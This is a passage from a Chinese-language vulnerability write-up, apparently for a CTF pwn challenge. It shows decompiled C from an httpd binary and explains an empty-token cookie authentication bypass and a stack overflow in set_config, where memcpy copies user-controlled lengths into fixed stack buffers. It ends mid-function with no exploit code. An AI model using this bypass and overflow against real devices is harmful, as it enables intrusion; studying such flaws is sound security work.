</div><p>想要访问页面并使用下层函数需要通过 judge_token ,然后惊讶地发现最开始 init 的时候 token 是空的,在 Cookie 中将 token 设定为空即可绕过鉴权</p> <h4 id="set_config">set_config </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">set_config</span><span class="p">(</span><span class="kt">request_t</span> <span class="o">*</span><span class="n">req</span><span class="p">,</span> <span class="kt">admin_info_t</span> <span class="o">*</span><span class="n">admin</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v6</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v8</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v10</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kt">post_field_t</span> <span class="o">*</span><span class="n">out_field</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-B0h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">post_field_t</span> <span class="o">*</span><span class="n">fields</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-A8h] </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="n">dest</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span> <span class="c1">// [rsp+20h] [rbp-A0h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="n">v14</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span> <span class="c1">// [rsp+40h] [rbp-80h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="n">v15</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span> <span class="c1">// [rsp+60h] [rbp-60h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="n">v16</span><span class="p">[</span><span class="mi">7</span><span class="p">];</span> <span class="c1">// [rsp+80h] [rbp-40h] BYREF </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v16</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fields</span> <span class="o">=</span> <span class="nf">make_post_ptr</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">searchtok</span><span class="p">(</span><span class="s">&#34;route_name&#34;</span><span class="p">,</span> <span class="n">fields</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">out_field</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">dest</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value_len</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">searchtok</span><span class="p">(</span><span class="s">&#34;ip&#34;</span><span class="p">,</span> <span class="n">fields</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">out_field</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">v14</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value_len</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">searchtok</span><span class="p">(</span><span class="s">&#34;subnet_mask&#34;</span><span class="p">,</span> <span class="n">fields</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">out_field</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">v15</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value_len</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="nf">searchtok</span><span class="p">(</span><span class="s">&#34;gateway&#34;</span><span class="p">,</span> <span class="n">fields</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">out_field</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">v16</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value</span><span class="p">,</span> <span class="n">out_field</span><span class="o">-&gt;</span><span class="n">value_len</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="n">dest</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">route_name</span> <span class="o">=</span> <span class="n">dest</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">route_name</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">v3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="n">dest</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">route_name</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="n">dest</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">route_name</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">v4</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="n">v14</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">ip</span> <span class="o">=</span> <span class="n">v14</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">ip</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">v5</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="n">v14</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">ip</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="n">v14</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">ip</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">v6</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="n">v15</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">subnet_mask</span> <span class="o">=</span> <span class="n">v15</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">subnet_mask</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">v7</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v8</span> <span class="o">=</span> <span class="n">v15</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">subnet_mask</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="n">v15</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">subnet_mask</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">v8</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v9</span> <span class="o">=</span> <span class="n">v16</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">gateway</span> <span class="o">=</span> <span class="n">v16</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">gateway</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">v9</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v10</span> <span class="o">=</span> <span class="n">v16</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">gateway</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="n">v16</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">admin</span><span class="o">-&gt;</span><span class="n">gateway</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="n">v10</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>这个 httpd 的风险函数挺多的,由于 value_len 可以自行指定,因此存在栈溢出漏洞</p> <h4 id="parse_post_fields">parse_post_fields </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">// Split application/x-www-form-urlencoded body into up to 20 post_field_t entries, URL-decoding both key and value. </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">parse_post_fields</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">body</span><span class="p">,</span> <span class="kt">post_field_t</span> <span class="o">*</span><span class="n">fields</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">result</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-48h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">line_cur</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-40h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">s1</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-38h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">j</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-30h] </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span> <span class="c1">// [rsp+48h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int64</span><span class="p">)</span><span class="n">body</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">line_cur</span> <span class="o">=</span> <span class="n">body</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">19</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int8</span><span class="p">)</span><span class="o">*</span><span class="n">line_cur</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">result</span> <span class="o">==</span> <span class="sc">&#39;\n&#39;</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">s1</span> <span class="o">=</span> <span class="n">line_cur</span><span class="p">;</span> <span class="o">*</span><span class="n">s1</span> <span class="o">!=</span> <span class="sc">&#39;&amp;&#39;</span> <span class="o">&amp;&amp;</span> <span class="nf">strncmp</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\r\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">2u</span><span class="p">);</span> <span class="o">++</span><span class="n">s1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">j</span> <span class="o">=</span> <span class="n">line_cur</span><span class="p">;</span> <span class="o">*</span><span class="n">j</span> <span class="o">!=</span> <span class="sc">&#39;=&#39;</span> <span class="o">&amp;&amp;</span> <span class="nf">strncmp</span><span class="p">(</span><span class="n">j</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\r\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">2u</span><span class="p">);</span> <span class="o">++</span><span class="n">j</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">j</span> <span class="o">==</span> <span class="sc">&#39;=&#39;</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span> <span class="o">=</span> <span class="nf">malloc</span><span class="p">(</span><span class="mh">0x1000u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x1000u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">line_cur</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">j</span> <span class="o">-</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">line_cur</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fields</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">key_len</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="nf">url_decode_component</span><span class="p">(</span><span class="n">fields</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">key</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memcpy</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">j</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">s1</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">j</span> <span class="o">+</span> <span class="mi">1</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">fields</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">value_len</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="nf">url_decode_component</span><span class="p">(</span><span class="n">fields</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">value</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int64</span><span class="p">)(</span><span class="n">s1</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">line_cur</span> <span class="o">=</span> <span class="n">s1</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>POST body 的格式是 key1=keyvalue1&amp;key2=keyvalue2&hellip;</p> <h4 id="url_decode_component">url_decode_component </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">_BYTE</span> <span class="o">*</span><span class="kr">__fastcall</span> <span class="nf">url_decode_component</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="n">a1</span><span class="p">,</span> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">a2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">v2</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">v3</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">v4</span><span class="p">;</span> <span class="c1">// rdx </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">v5</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">v6</span><span class="p">;</span> <span class="c1">// rdx </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">v7</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v10</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-14h] </span></span></span><span class="line"><span class="cl"> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">v11</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-10h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v11</span> <span class="o">=</span> <span class="n">a1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="o">*</span><span class="n">a2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">a2</span> <span class="o">==</span> <span class="sc">&#39;+&#39;</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="n">v11</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">v2</span> <span class="o">=</span> <span class="sc">&#39; &#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">++</span><span class="n">a2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">a2</span> <span class="o">==</span> <span class="sc">&#39;%&#39;</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">a2</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">||</span> <span class="o">!</span><span class="n">a2</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">||</span> <span class="p">(</span><span class="n">v9</span> <span class="o">=</span> <span class="nf">hex_to_nibble</span><span class="p">(</span><span class="n">a2</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">v10</span> <span class="o">=</span> <span class="nf">hex_to_nibble</span><span class="p">(</span><span class="n">a2</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="n">v9</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">||</span> <span class="n">v10</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="n">a2</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="n">v11</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">v5</span> <span class="o">=</span> <span class="o">*</span><span class="n">v4</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="n">v11</span><span class="o">++</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">v3</span> <span class="o">=</span> <span class="n">v10</span> <span class="o">|</span> <span class="p">(</span><span class="mi">16</span> <span class="o">*</span> <span class="n">v9</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">a2</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> 